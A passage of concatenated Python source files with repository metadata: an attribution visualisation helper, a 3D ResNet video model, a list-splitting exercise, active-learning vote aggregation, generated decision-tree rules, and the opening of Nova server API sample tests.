    ref_base_line = torch.ones_like(input_ids)

    # Convert back to tokens as the model requires.
    # As some words might get split up. e.g. Caroll to Carol l.
    all_tokens = flair_model_wrapper.tokenizer.convert_ids_to_tokens(input_ids[0])

    # The tokenizer in the model adds a special character
    # in front of every sentence.
    readable_tokens = [token.replace("▁", "") for token in all_tokens]

    # The input IDs are passed to the embedding layer of the model.
    # It is better to return the logits for Captum.
    # https://github.com/pytorch/captum/issues/355#issuecomment-619610044
    # Thus we calculate the softmax afterwards.
    # For now, I take the first dimension and run this sentence, per sentence.
    model_outputs = flair_model_wrapper(input_ids)

    softmax = torch.nn.functional.softmax(model_outputs[0], dim=0)

    # Return the confidence and the class ID of the top predicted class.
    conf, idx = torch.max(softmax, 0)

    #conf, idx = torch.max(model_outputs[0], 0)

    # Returns the probability.
    prediction_confidence = conf.item()

    # Returns the label name from the top prediction class.
    pred_label = flair_model_wrapper.label_dictionary.get_item_for_index(idx.item())

    # Calculate the attributions according to the LayerIntegratedGradients method.
    attributions_ig, delta = lig.attribute(input_ids,
                                           baselines=ref_base_line,
                                           n_steps=n_steps,
                                           return_convergence_delta=True,
                                           target=target_index,
                                           method=estimation_method,
                                           internal_batch_size=internal_batch_size)

    convergence_delta = abs(delta)

    print('pred: ', idx.item(), '(', '%.2f' % conf.item(), ')', ', delta: ', convergence_delta)

    word_attributions, attribution_score = summarize_attributions(attributions_ig)

    # Record everything needed by Captum's HTML visualizer.
    visualization_list.append(
        viz.VisualizationDataRecord(word_attributions=word_attributions,
                                    pred_prob=prediction_confidence,
                                    pred_class=pred_label,
                                    true_class=target_label,
                                    attr_class=target_label,
                                    attr_score=attribution_score,
                                    raw_input=readable_tokens,
                                    convergence_score=delta)
    )

    # Return these for the sanity checks.
    return readable_tokens, word_attributions, convergence_delta
def summarize_attributions(attributions):
    """Reduce embedding-level attributions to per-token scores.

    Inputs:
    attributions: integrated-gradients attributions of shape
        (1, n_tokens, embedding_dim).

    Outputs:
    token_attrs: L2-normalized attribution score per token.
    attribution_score: sum of the normalized scores, i.e. the attribution
        of the whole document w.r.t. the target label.
    """
    # Collapse the embedding dimension, then drop the batch dimension.
    token_attrs = attributions.sum(dim=-1).squeeze(0)
    # Normalize so the per-token vector has unit L2 norm.
    token_attrs = token_attrs / torch.norm(token_attrs)
    return token_attrs, token_attrs.sum()
def visualize_attributions(visualization_list):
    """
    Helper function to call Captum's visualization methods.

    Inputs:
    visualization_list: a list of VisualizationDataRecord objects built by
        `interpret_sentence`, containing the integrated-gradients
        attributions to render (as HTML in a notebook).
    """
    viz.visualize_text(visualization_list)
| 40.566929 | 166 | 0.657026 |
795c6428e693a34b6ba5c1102787477fab08ea63 | 8,544 | py | Python | nets/GC_GST.py | haoyanbin918/Group-Contextualization | aa59d9979f6f6578f143df48086260afdde65b86 | [
"Apache-2.0"
] | 4 | 2022-03-21T03:25:57.000Z | 2022-03-23T13:07:22.000Z | nets/GC_GST.py | haoyanbin918/Group-Contextualization | aa59d9979f6f6578f143df48086260afdde65b86 | [
"Apache-2.0"
] | 1 | 2022-03-21T06:49:25.000Z | 2022-03-21T07:47:54.000Z | nets/GC_GST.py | haoyanbin918/Group-Contextualization | aa59d9979f6f6578f143df48086260afdde65b86 | [
"Apache-2.0"
] | 1 | 2022-03-22T06:03:33.000Z | 2022-03-22T06:03:33.000Z | import torch
import torch.nn as nn
import math
import torch.utils.model_zoo as model_zoo
import torchvision.models as models
from nets.Calibrator3D import GC_L33Dnb, GC_T13Dnb, GC_S23DDnb, GC_CLLDnb
__all__ = ['ResNet', 'resnet50', 'resnet101','resnet152']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
class Bottleneck(nn.Module):
    """3D ResNet bottleneck with a grouped spatial/temporal 3x3 stage and
    optional Group-Context calibrators (GC_*) applied to channel slices.

    The middle stage splits `planes` channels between a spatial-only conv
    (`conv2`, kernel (1,3,3), (alpha-1)/alpha of the channels) and a
    spatio-temporal conv (`Tconv`, kernel 3x3x3, 1/alpha of the channels);
    with beta == 2 the input channels are also split in half between them.
    """
    # Output channels of the block are `planes * expansion`.
    expansion = 4

    def __init__(self, inplanes, planes, alpha, beta, stride = 1, downsample = None, use_ef=False, cdiv=8, loop_id=0):
        super(Bottleneck, self).__init__()
        self.use_ef = use_ef
        self.conv1 = nn.Conv3d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm3d(planes)
        # Spatial-only branch: (alpha-1)/alpha of the middle channels.
        self.conv2 = nn.Conv3d(planes// beta, planes//alpha*(alpha-1), kernel_size=(1,3,3), stride=(1,stride,stride),
                               padding=(0,1,1), bias=False)
        # Temporal branch: remaining 1/alpha of the middle channels.
        self.Tconv = nn.Conv3d(planes//beta, planes//alpha, kernel_size = 3, bias = False,stride=(1,stride,stride),
                               padding = (1,1,1))
        self.bn2 = nn.BatchNorm3d(planes)
        self.conv3 = nn.Conv3d(planes, planes * self.expansion, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm3d(planes * self.expansion)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride
        self.alpha = alpha
        self.beta = beta
        if self.use_ef:
            print('=> Using Partial Channel Calibrator with cdiv: {}'.format(cdiv))
            self.loop_id = loop_id
            # Each calibrator handles one contiguous slice of planes//cdiv
            # channels; the four slices start at loop_id and advance by one
            # slice each (modulo cdiv), so they may wrap around.
            self.eft_c = planes // cdiv
            self.eft1 = GC_L33Dnb(self.eft_c, self.eft_c)
            self.eft2 = GC_T13Dnb(self.eft_c, self.eft_c)
            self.eft3 = GC_S23DDnb(self.eft_c, self.eft_c)
            self.eft4 = GC_CLLDnb(self.eft_c, self.eft_c)
            # self.eft = (self.eft_c, self.eft_c, num_segments)
            self.start_c1 = loop_id*self.eft_c
            self.end_c1 = self.start_c1 + self.eft_c
            loop_id2 = (loop_id+1)%cdiv
            self.start_c2 = loop_id2*self.eft_c
            self.end_c2 = self.start_c2 + self.eft_c
            loop_id3 = (loop_id+2)%cdiv
            self.start_c3 = loop_id3*self.eft_c
            self.end_c3 = self.start_c3 + self.eft_c
            loop_id4 = (loop_id+3)%cdiv
            self.start_c4 = loop_id4*self.eft_c
            self.end_c4 = self.start_c4 + self.eft_c
            print('loop_ids: [{}:({}-{}), {}:({}-{}), {}:({}-{}), {}:({}-{})]'.format(loop_id, self.start_c1, self.end_c1, \
                loop_id2, self.start_c2, self.end_c2, loop_id3, self.start_c3, self.end_c3, loop_id4, self.start_c4, self.end_c4))

    def forward(self, x):
        # x: 5D tensor (batch, channels, time, height, width).
        residual = x

        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)

        if self.beta == 2:
            # Split channels in half: left -> spatial conv, right -> temporal.
            nchannels = out.size()[1] // self.beta
            left = out[:,:nchannels]
            right = out[:,nchannels:]
            out1 = self.conv2(left)
            out2 = self.Tconv(right)
        else:
            out1 = self.conv2(out)
            out2 = self.Tconv(out)
        out = torch.cat((out1,out2),dim=1)

        if self.use_ef:
            # Apply the four calibrators to their channel slices; copy the
            # untouched channels over unchanged.
            new_out = torch.zeros_like(out)
            B_size, C_size, T_size, H_size, W_size = new_out.size()
            # new_out = out
            new_out[:, self.start_c1:self.end_c1, :, :, :] = self.eft1(out[:, self.start_c1:self.end_c1, :, :, :])
            new_out[:, self.start_c2:self.end_c2, :, :, :] = self.eft2(out[:, self.start_c2:self.end_c2, :, :, :])
            new_out[:, self.start_c3:self.end_c3, :, :, :] = self.eft3(out[:, self.start_c3:self.end_c3, :, :, :])
            new_out[:, self.start_c4:self.end_c4, :, :, :] = self.eft4(out[:, self.start_c4:self.end_c4, :, :, :])
            # new_out = torch.zeros_like(out)
            # new_out[:, :self.eft_c, :, :] = self.eft(out[:, :self.eft_c, :, :])
            # NOTE(review): the two cases below cover the non-wrapped
            # (end_c4 > start_c1) and fully-wrapped (end_c4 < start_c1)
            # layouts of the four slices; confirm all wrap positions are
            # covered for every cdiv/loop_id combination.
            if self.end_c4 > self.start_c1:
                if self.start_c1 > 0:
                    new_out[:, :self.start_c1:, :, :] = out[:, :self.start_c1:, :, :]
                if self.end_c4 < C_size:
                    new_out[:, self.end_c4:, :, :] = out[:, self.end_c4:, :, :]
            elif self.end_c4 < self.start_c1:
                new_out[:, self.end_c4:self.start_c1:, :, :] = out[:, self.end_c4:self.start_c1:, :, :]
            out = new_out

        out = self.bn2(out)
        out = self.relu(out)

        out = self.conv3(out)
        out = self.bn3(out)

        if self.downsample is not None:
            residual = self.downsample(residual)

        out += residual
        out = self.relu(out)

        return out
class ResNet(nn.Module):
    """3D ResNet backbone built from `Bottleneck` blocks with Group-Context
    calibrators inserted into (a subset of) the blocks.

    `loop=True` rotates the calibrator slice offset (`loop_id`) across
    successive calibrated blocks, modulo `cdiv`.
    """

    def __init__(self, block, layers, alpha=4, beta=2, num_classes=1000, cdiv=4, loop=False):
        self.inplanes = 64
        self.loop_id = 0
        super(ResNet, self).__init__()
        # Stem: spatial-only 7x7 conv + pooling (no temporal downsampling).
        self.conv1 = nn.Conv3d(3, 64, kernel_size=(1,7,7), stride=(1,2,2), padding=(0,3,3),
                               bias=False)
        self.bn1 = nn.BatchNorm3d(64)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool3d(kernel_size=(1,3,3), stride=(1,2,2), padding=(0,1,1))
        self.loop = loop
        self.layer1 = self._make_layer(block, 64, layers[0], alpha, beta, cdiv=cdiv)
        self.layer2 = self._make_layer(block, 128, layers[1], alpha, beta, stride=2, cdiv=cdiv)
        self.layer3 = self._make_layer(block, 256, layers[2], alpha, beta, stride=2, cdiv=cdiv)
        self.layer4 = self._make_layer(block, 512, layers[3], alpha, beta, stride=2, cdiv=cdiv)
        self.avgpool = nn.AvgPool2d(7, stride=1)
        self.fc = nn.Linear(512 * block.expansion, num_classes)

        # Initialize backbone weights; calibrator ('eft*') modules keep
        # their own initialization.
        for name, m in self.named_modules():
            if 'eft' not in name:
                if isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv3d):
                    nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                elif isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm3d):
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)

    def _make_layer(self, block, planes, blocks, alpha, beta, stride=1, cdiv=2):
        """Build one ResNet stage of `blocks` bottleneck blocks.

        The first block always uses calibrators; later blocks use them
        every `n_round` blocks (every 2nd block for very deep stages).
        """
        print('=> Processing stage with {} blocks'.format(blocks))
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv3d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=(1,stride,stride), bias=False),
                nn.BatchNorm3d(planes * block.expansion),
            )

        layers = []
        layers.append(block(self.inplanes, planes, alpha, beta, stride, downsample, True, cdiv=cdiv, loop_id=self.loop_id))
        self.inplanes = planes * block.expansion
        if self.loop:
            self.loop_id = (self.loop_id+1)%cdiv
        n_round = 1
        if blocks >= 23:
            n_round = 2
            print('=> Using n_round {} to insert Group Context'.format(n_round))
        for i in range(1, blocks):
            if i % n_round == 0:
                use_ef = True
            else:
                use_ef = False
            layers.append(block(self.inplanes, planes, alpha, beta, use_ef=use_ef, cdiv=cdiv, loop_id=self.loop_id))
            if self.loop and use_ef:
                self.loop_id = (self.loop_id+1)%cdiv

        return nn.Sequential(*layers)

    def forward(self, x):
        # x: (batch, 3, T, H, W) video clip.
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)

        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)

        # Fold the temporal dimension into the batch so 2D average pooling
        # and the classifier run per-frame; output is (batch*T, num_classes).
        x = x.transpose(1,2).contiguous()
        x = x.view((-1,)+x.size()[2:])
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)

        return x
def resnet50(alpha, beta,**kwargs):
    """Constructs a ResNet-50 based model.

    Loads ImageNet 2D weights from torchvision's model zoo and inflates
    them to 3D: conv weights gain a singleton time dimension, and `conv2`
    weights are sliced to the reduced channel counts implied by
    `alpha`/`beta` (see `Bottleneck`). `strict=False` leaves the new
    `Tconv` and calibrator parameters randomly initialized.
    """
    model = ResNet(Bottleneck, [3, 4, 6, 3], alpha, beta, **kwargs)
    checkpoint = model_zoo.load_url(model_urls['resnet50'])
    layer_name = list(checkpoint.keys())
    for ln in layer_name:
        if 'conv' in ln or 'downsample.0.weight' in ln:
            # Inflate 2D kernel (out,in,kH,kW) -> 3D (out,in,1,kH,kW).
            checkpoint[ln] = checkpoint[ln].unsqueeze(2)
        if 'conv2' in ln:
            n_out, n_in, _, _, _ = checkpoint[ln].size()
            checkpoint[ln] = checkpoint[ln][:n_out // alpha * (alpha - 1), :n_in//beta,:,:,:]
    model.load_state_dict(checkpoint,strict = False)
    return model
def resnet101(alpha, beta ,**kwargs):
    """Constructs a ResNet-101 based model.

    Loads ImageNet 2D weights from torchvision's model zoo and inflates
    them to 3D, slicing `conv2` weights per `alpha`/`beta` exactly like
    `resnet50`. `strict=False` leaves the new `Tconv` and calibrator
    parameters randomly initialized.
    """
    # BUG FIX: alpha/beta were previously not forwarded to ResNet(), so the
    # model was built with the default alpha=4/beta=2 while the checkpoint
    # below was sliced with the caller's alpha/beta — now kept consistent
    # with resnet50.
    model = ResNet(Bottleneck, [3, 4, 23, 3], alpha, beta, **kwargs)
    checkpoint = model_zoo.load_url(model_urls['resnet101'])
    layer_name = list(checkpoint.keys())
    for ln in layer_name:
        if 'conv' in ln or 'downsample.0.weight' in ln:
            # Inflate 2D kernel (out,in,kH,kW) -> 3D (out,in,1,kH,kW).
            checkpoint[ln] = checkpoint[ln].unsqueeze(2)
        if 'conv2' in ln:
            n_out, n_in, _, _, _ = checkpoint[ln].size()
            checkpoint[ln] = checkpoint[ln][:n_out // alpha * (alpha - 1), :n_in//beta,:,:,:]
    model.load_state_dict(checkpoint,strict = False)
    return model
if __name__ == "__main__":
    # Smoke test: run one random clip through the model and profile it.
    inputs = torch.rand(1, 3, 8, 224, 224) #[btz, channel, T, H, W]
    # inputs = torch.rand(1, 64, 4, 112, 112) #[btz, channel, T, H, W]
    net = resnet50(4, 2, num_classes=1000, cdiv=4)
    net.eval()
    output = net(inputs)
    print(output.size())
    # FLOPs/parameter count via the third-party `thop` package
    # (imported lazily so the model itself has no hard dependency on it).
    from thop import profile
    flops, params = profile(net, inputs=(inputs, ))
    print(flops)
    print(params)
| 34.451613 | 130 | 0.660229 |
795c6606c019a7661269455e17110a482e63c8c4 | 693 | py | Python | 01 List/Problems/02_separate_even_odd.py | kmanadkat/leetcode-101 | 8a9db22d98692d634a497ba76c7e9f792bb1f1bc | [
"MIT"
] | null | null | null | 01 List/Problems/02_separate_even_odd.py | kmanadkat/leetcode-101 | 8a9db22d98692d634a497ba76c7e9f792bb1f1bc | [
"MIT"
] | null | null | null | 01 List/Problems/02_separate_even_odd.py | kmanadkat/leetcode-101 | 8a9db22d98692d634a497ba76c7e9f792bb1f1bc | [
"MIT"
] | 1 | 2021-09-15T11:17:36.000Z | 2021-09-15T11:17:36.000Z | from typing import List, Tuple
# Approach 1 - Simpler
# Approach 1 - Simpler
def separateEvenOdd(inputList: List) -> Tuple:
    """Partition *inputList* into (evens, odds), preserving input order."""
    buckets = ([], [])  # buckets[0]: even values, buckets[1]: odd values
    for value in inputList:
        buckets[value % 2].append(value)
    return buckets[0], buckets[1]
# Approach 2 - List Comprehensions
def separateEvenOddComprehension(inputList: List) -> Tuple:
even = [x for x in inputList if x % 2 == 0]
odd = [x for x in inputList if x % 2 != 0]
return even, odd
# Demo: exercise both implementations on the same sample data.
# Guarded so that importing this module no longer runs the demo at import
# time (previously these statements executed unconditionally).
if __name__ == "__main__":
    even1, odd1 = separateEvenOdd(inputList=[10, 41, 30, 15, 80])
    print(even1)
    print(odd1)

    even2, odd2 = separateEvenOddComprehension(inputList=[10, 41, 30, 15, 80])
    print(even2)
    print(odd2)
795c665c96357ffa519960db2f4b35dd09a33717 | 3,971 | py | Python | skactiveml/utils/_aggregation.py | AlexandreAbraham/scikit-activeml | 1e1f4615948501cb9c9559de2e94433f700b2b80 | [
"BSD-3-Clause"
] | 40 | 2020-09-22T00:50:52.000Z | 2022-03-15T14:16:42.000Z | skactiveml/utils/_aggregation.py | AlexandreAbraham/scikit-activeml | 1e1f4615948501cb9c9559de2e94433f700b2b80 | [
"BSD-3-Clause"
] | 161 | 2020-08-10T09:24:03.000Z | 2022-03-29T13:39:46.000Z | skactiveml/utils/_aggregation.py | AlexandreAbraham/scikit-activeml | 1e1f4615948501cb9c9559de2e94433f700b2b80 | [
"BSD-3-Clause"
] | 3 | 2021-11-15T09:10:59.000Z | 2021-12-15T11:40:47.000Z | import numpy as np
from ._label import ExtLabelEncoder, is_labeled
from sklearn.utils import check_array, check_consistent_length
def compute_vote_vectors(y, w=None, classes=None, missing_label=np.nan):
    """Counts number of votes per class label for each sample.

    Parameters
    ----------
    y : array-like, shape (n_samples) or (n_samples, n_annotators)
        Class labels.
    w : array-like, shape (n_samples) or (n_samples, n_annotators),
    default=np.ones_like(y)
        Class label weights.
    classes : array-like, shape (n_classes), default=None
        Holds the label for each class.
    missing_label : scalar|string|np.nan|None, default=np.nan
        Value to represent a missing label.

    Returns
    -------
    v : array-like, shape (n_samples, n_classes)
        V[i,j] counts number of votes per class j for sample i.

    Raises
    ------
    ValueError
        If the number of classes cannot be inferred (no labels and
        `classes` is None).
    """
    # check input parameters
    # Encode labels to integer indices; missing labels become NaN.
    le = ExtLabelEncoder(classes=classes, missing_label=missing_label)
    y = le.fit_transform(y)
    n_classes = len(le.classes_)
    y = y if y.ndim == 2 else y.reshape((-1, 1))
    is_unlabeled_y = np.isnan(y)
    # Temporarily map missing labels to class 0 so the array can be int;
    # their weight is zeroed below so they contribute no votes.
    y[is_unlabeled_y] = 0
    y = y.astype(int)
    if n_classes == 0:
        raise ValueError(
            "Number of classes can not be inferred. "
            "There must be at least one assigned label or classes must not be"
            "None. "
        )

    w = np.ones_like(y) if w is None else check_array(w, ensure_2d=False,
                                                      force_all_finite=False,
                                                      dtype=None, copy=True)
    w = w if w.ndim == 2 else w.reshape((-1, 1))
    check_consistent_length(y, w)
    check_consistent_length(y.T, w.T)
    # Placeholder weight for unlabeled entries (overwritten with 0 below).
    w[is_unlabeled_y] = 1

    # count class labels per class and weight by confidence scores
    # Unlabeled entries and NaN weights contribute zero votes.
    w[np.logical_or(np.isnan(w), is_unlabeled_y)] = 0
    # Offset each row's labels into a distinct bin range so one bincount
    # call produces the per-sample histogram.
    y_off = y + np.arange(y.shape[0])[:, None] * n_classes
    v = np.bincount(y_off.ravel(), minlength=y.shape[0] * n_classes,
                    weights=w.ravel())
    v = v.reshape(-1, n_classes)

    return v
def majority_vote(y, w=None, classes=None, missing_label=np.nan):
    """ Assigns a label to each sample based on weighted voting.
    Samples with no labels are assigned with `missing_label`.

    Parameters
    ----------
    y : array-like, shape (n_samples) or (n_samples, n_annotators)
        Class labels.
    w : array-like, shape (n_samples) or (n_samples, n_annotators),
    default=np.ones_like(y)
        Class label weights.
    classes : array-like, shape (n_classes), default=None
        Holds the label for each class.
    missing_label : scalar|string|np.nan|None, default=np.nan
        Value to represent a missing label.

    Returns
    -------
    y_aggregated : array-like, shape (n_samples)
        Assigned labels for each sample. Ties are broken in favor of the
        lowest encoded class index (argmax behavior).
    """
    # check input parameters
    y = check_array(y, ensure_2d=False, dtype=None, force_all_finite=False)
    y = y if y.ndim == 2 else y.reshape((-1, 1))
    n_samples = y.shape[0]

    # extract labeled samples (rows with at least one assigned label)
    is_labeled_y = np.any(is_labeled(y, missing_label), axis=1)
    y_labeled = y[is_labeled_y]

    # infer encoding from the labeled subset only
    le = ExtLabelEncoder(classes=classes, missing_label=missing_label)
    le.fit(y_labeled)
    y_aggregated = np.full((n_samples,), missing_label, dtype=le._dtype)

    if np.any(is_labeled_y):
        # transform labels
        y_labeled_transformed = le.transform(y_labeled)
        max_value_y_l_t = np.nanmax(y_labeled_transformed)

        # perform voting: per-sample weighted vote counts, then argmax
        vote_matrix = compute_vote_vectors(y_labeled_transformed, w,
                                           classes=np.arange(max_value_y_l_t+1))
        vote_vector = vote_matrix.argmax(axis=1)

        # inverse transform labels
        y_labeled_inverse_transformed = le.inverse_transform(vote_vector)
        # assign labels (unlabeled rows keep missing_label)
        y_aggregated[is_labeled_y] = y_labeled_inverse_transformed

    return y_aggregated
| 34.530435 | 80 | 0.639637 |
795c674cfb8299abe5633b42de3847a970b71d1a | 2,158 | py | Python | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/16_features/numtrees_30/rule_19.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/16_features/numtrees_30/rule_19.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/16_features/numtrees_30/rule_19.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Children, obj[8]: Education, obj[9]: Occupation, obj[10]: Income, obj[11]: Bar, obj[12]: Coffeehouse, obj[13]: Restaurant20to50, obj[14]: Direction_same, obj[15]: Distance
# {"feature": "Passanger", "instances": 34, "metric_value": 0.9082, "depth": 1}
if obj[0]<=2:
# {"feature": "Time", "instances": 28, "metric_value": 0.9666, "depth": 2}
if obj[2]<=2:
# {"feature": "Children", "instances": 20, "metric_value": 0.8113, "depth": 3}
if obj[7]<=0:
# {"feature": "Coupon", "instances": 11, "metric_value": 0.4395, "depth": 4}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 5}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.9911, "depth": 4}
if obj[13]>0.0:
# {"feature": "Coupon", "instances": 7, "metric_value": 0.8631, "depth": 5}
if obj[3]<=3:
# {"feature": "Education", "instances": 5, "metric_value": 0.971, "depth": 6}
if obj[8]>2:
# {"feature": "Distance", "instances": 3, "metric_value": 0.9183, "depth": 7}
if obj[15]<=2:
return 'False'
elif obj[15]>2:
return 'True'
else: return 'True'
elif obj[8]<=2:
return 'True'
else: return 'True'
elif obj[3]>3:
return 'True'
else: return 'True'
elif obj[13]<=0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[2]>2:
# {"feature": "Occupation", "instances": 8, "metric_value": 0.8113, "depth": 3}
if obj[9]>1:
return 'False'
elif obj[9]<=1:
# {"feature": "Coupon", "instances": 3, "metric_value": 0.9183, "depth": 4}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[0]>2:
return 'True'
else: return 'True'
| 37.206897 | 323 | 0.567655 |
795c67a360132e33635e369db036484e1bf509be | 32,143 | py | Python | nova-19.0.1/nova/tests/functional/api_sample_tests/test_servers.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 1 | 2019-04-22T06:25:26.000Z | 2019-04-22T06:25:26.000Z | nova/tests/functional/api_sample_tests/test_servers.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | nova/tests/functional/api_sample_tests/test_servers.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import time
from oslo_utils import fixture as utils_fixture
from oslo_utils import timeutils
import six
from nova.api.openstack import api_version_request as avr
import nova.conf
from nova.tests import fixtures as nova_fixtures
from nova.tests.functional.api_sample_tests import api_sample_base
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit.image import fake
CONF = nova.conf.CONF
class ServersSampleBase(api_sample_base.ApiSampleTestBaseV21):
    """Base class for the servers API sample tests.

    Provides `_post_server`, which creates a server from a versioned
    request template and verifies the create response against the
    corresponding sample file.
    """
    # Microversion sent with every request; None means the default (2.1).
    microversion = None
    sample_dir = 'servers'

    user_data_contents = six.b('#!/bin/bash\n/bin/su\necho "I am in you!"\n')
    user_data = base64.b64encode(user_data_contents)

    # (min_version, max_version, template name) — which common create
    # request template applies to a given microversion range.
    common_req_names = [
        (None, '2.36', 'server-create-req'),
        ('2.37', '2.56', 'server-create-req-v237'),
        ('2.57', None, 'server-create-req-v257')
    ]

    def _get_request_name(self, use_common):
        """Return the create-request template name for this microversion.

        Returns the per-test template when `use_common` is False;
        otherwise picks the common template whose version range matches.
        """
        if not use_common:
            return 'server-create-req'

        api_version = self.microversion or '2.1'
        for min, max, name in self.common_req_names:
            if avr.APIVersionRequest(api_version).matches(
                    avr.APIVersionRequest(min), avr.APIVersionRequest(max)):
                return name

    def _post_server(self, use_common_server_api_samples=True, name=None,
                     extra_subs=None):
        """Create a server via the sample request and return its uuid.

        Verifies the response against 'server-create-resp'.
        `extra_subs` extends the template substitutions.
        """
        # param use_common_server_api_samples: Boolean to set whether tests use
        # common sample files for server post request and response.
        # Default is True which means _get_sample_path method will fetch the
        # common server sample files from 'servers' directory.
        # Set False if tests need to use extension specific sample files
        subs = {
            'image_id': fake.get_valid_image_id(),
            'host': self._get_host(),
            'compute_endpoint': self._get_compute_endpoint(),
            'versioned_compute_endpoint': self._get_vers_compute_endpoint(),
            'glance_host': self._get_glance_host(),
            'access_ip_v4': '1.2.3.4',
            'access_ip_v6': '80fe::',
            'user_data': (self.user_data if six.PY2
                          else self.user_data.decode('utf-8')),
            'uuid': '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}'
                    '-[0-9a-f]{4}-[0-9a-f]{12}',
            'name': 'new-server-test' if name is None else name,
        }
        # If the template is requesting an explicit availability zone and
        # the test is setup to have AZs, use the first one in the list which
        # should default to "us-west".
        if self.availability_zones:
            subs['availability_zone'] = self.availability_zones[0]
        if extra_subs:
            subs.update(extra_subs)
        # Temporarily flip the class-level flag; restore it even on failure.
        orig_value = self.__class__._use_common_server_api_samples
        try:
            self.__class__._use_common_server_api_samples = (
                use_common_server_api_samples)
            response = self._do_post('servers', self._get_request_name(
                use_common_server_api_samples), subs)
            status = self._verify_response('server-create-resp', subs,
                                           response, 202)
            return status
        finally:
            self.__class__._use_common_server_api_samples = orig_value

    def setUp(self):
        super(ServersSampleBase, self).setUp()
        self.api.microversion = self.microversion
class ServersSampleJsonTest(ServersSampleBase):
    """Sample tests for the basic server CRUD flows (create/get/list)."""
    # This controls whether or not we use the common server API sample
    # for server post req/resp.
    use_common_server_post = True
    microversion = None

    def test_servers_post(self):
        # Returns the uuid of the created server for reuse by other tests.
        return self._post_server(
            use_common_server_api_samples=self.use_common_server_post)

    def test_servers_get(self):
        """Create a server, GET it, and verify against the sample."""
        self.stub_out(
            'nova.db.api.block_device_mapping_get_all_by_instance_uuids',
            fakes.stub_bdm_get_all_by_instance_uuids)
        uuid = self.test_servers_post()
        response = self._do_get('servers/%s' % uuid)
        # Regex substitutions for fields that vary between runs.
        subs = {}
        subs['hostid'] = '[a-f0-9]+'
        subs['id'] = uuid
        subs['instance_name'] = 'instance-\d{8}'
        subs['hypervisor_hostname'] = r'[\w\.\-]+'
        subs['hostname'] = r'[\w\.\-]+'
        subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
        subs['access_ip_v4'] = '1.2.3.4'
        subs['access_ip_v6'] = '80fe::'
        subs['user_data'] = (self.user_data if six.PY2
                             else self.user_data.decode('utf-8'))
        # config drive can be a string for True or empty value for False
        subs['cdrive'] = '.*'
        self._verify_response('server-get-resp', subs, response, 200)

    def test_servers_list(self):
        """Create a server and verify the brief list representation."""
        uuid = self._post_server()
        response = self._do_get('servers?limit=1')
        subs = {'id': uuid}
        self._verify_response('servers-list-resp', subs, response, 200)

    def test_servers_details(self):
        """Create a server and verify the detailed list representation."""
        self.stub_out(
            'nova.db.api.block_device_mapping_get_all_by_instance_uuids',
            fakes.stub_bdm_get_all_by_instance_uuids)
        uuid = self.test_servers_post()
        response = self._do_get('servers/detail?limit=1')
        subs = {}
        subs['hostid'] = '[a-f0-9]+'
        subs['id'] = uuid
        subs['instance_name'] = 'instance-\d{8}'
        subs['hypervisor_hostname'] = r'[\w\.\-]+'
